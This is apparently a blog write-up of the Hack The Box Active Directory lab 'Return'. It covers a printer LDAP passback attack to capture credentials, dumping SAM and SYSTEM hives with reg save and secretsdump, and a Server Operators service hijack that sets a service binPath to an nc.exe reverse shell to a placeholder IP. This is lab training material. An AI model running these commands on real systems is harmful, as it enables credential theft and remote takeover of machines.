Hello everyone, in today’s post we are going over the another Active Directory from Hack the Box – Return. Enjoy!
1)Starting off with the Nmap scan as usual:
2)There is a lot of going on here, but the most interesting for now is the port 80, the web server:
2.1)Whenever I am doing the Active Directory Box and I see devices such as printers, the first thing that comes to my mind is LDAP and the Passback attack! This becomes very interesting if we can control the connection of the printer in this case and intercept it as we can get the clear-text credentials via LDAP!
2.2)Enumerating the website further, we can see that indeed we can control where this printer connects to, and on top of that we have the service account and hidden password to initiate a connection with:
2.3) I changed the previous Server Address with my IP (tun0) and I left the 389 port as is (LDAP), then I started the netcat listener on port 389. This way we can intercept the request and obtain clear-text credentials for the svc-printer!
nc -lvnp 389
3)Checking right away if the svc-printer is part of the Remote Management Users, meaning that we can connect remotely to the machine via evil-winrm:
Bingo! We got user.txt. Let’s see how we can escalate our privileges
3.1) I started as usual with bloodhound enumeration. While I was waiting for the data to be collected, I started off with the manual enumeration and spotted that svc-printer has some very dangerous privileges, in particular SeBackup and SeRestore:
3.2) This can be easy win because this way we can obtain a copy of SAM and SYSTEM files that we can use to dump all the hashes from the target machine! So that is exactly what I did:
reg save hklm\sam SAM
reg save hklm\system SYSTEM
3.3)Then we can use handy download feature of evil-winrm to download those 2 files locally, and we can make use of secretsdump to extract hashes from those…
secretsdump.py -sam SAM -system SYSTEM LOCAL
3.4) Cool, we got the hashes! Last thing to do is to conduct pass-the-hash attack via evil-winrm for example or your other favorite tool!
3.5)But wait… That doesn’t work?!
3.6)Hmmm… Let’s enumerate the output of the Bloodhound:
4)We can see that the svc-printer is part of the Server Operators group, this is not the vulnerability itself but this group has dangerous privileges, more details can be found here in this great post: https://www.hackingarticles.in/windows-privilege-escalation-server-operator-group/:
By following the blog post I can check what services are present on the target host, and I see that I am not alone, somebody else is also rooting the machine and already edited VMTools Service, but that is not a problem we can overwrite his/her command:
4.1)So by following the Blog post we can make a use of our membership in Server Operators Group and configure the services, in this case, VMTools:
1)sc.exe config VMTools binPath="C:\Users\aarti\Documents\nc.exe -e cmd.exe <YOUR_IP_HERE> 1234"
2)nc -lvp 1234
3)sc.exe stop VMTools
4)sc.exe start VMTools4.2) And we got the elevated shell, GG!
Lessons Learned
1)Amazing Box overall. The first lesson that can be learned here is the Passback attack which can be very handy and easy win for further exploitation
2) The second lesson that I learned is definitely that Box can have multiple privilege escalation paths, but that doesn’t mean that each one works. In this instance, I thought that restoring SAM & SYSTEM and dumping hashes from those was the way to victory, but it wasn’t. It’s always worth checking everything twice and taking a step back if needed.
3) The third lesson that I learned is the dangerous Server Operators Group that will allow us to configure services and that way escalate our privileges!
Leave a Reply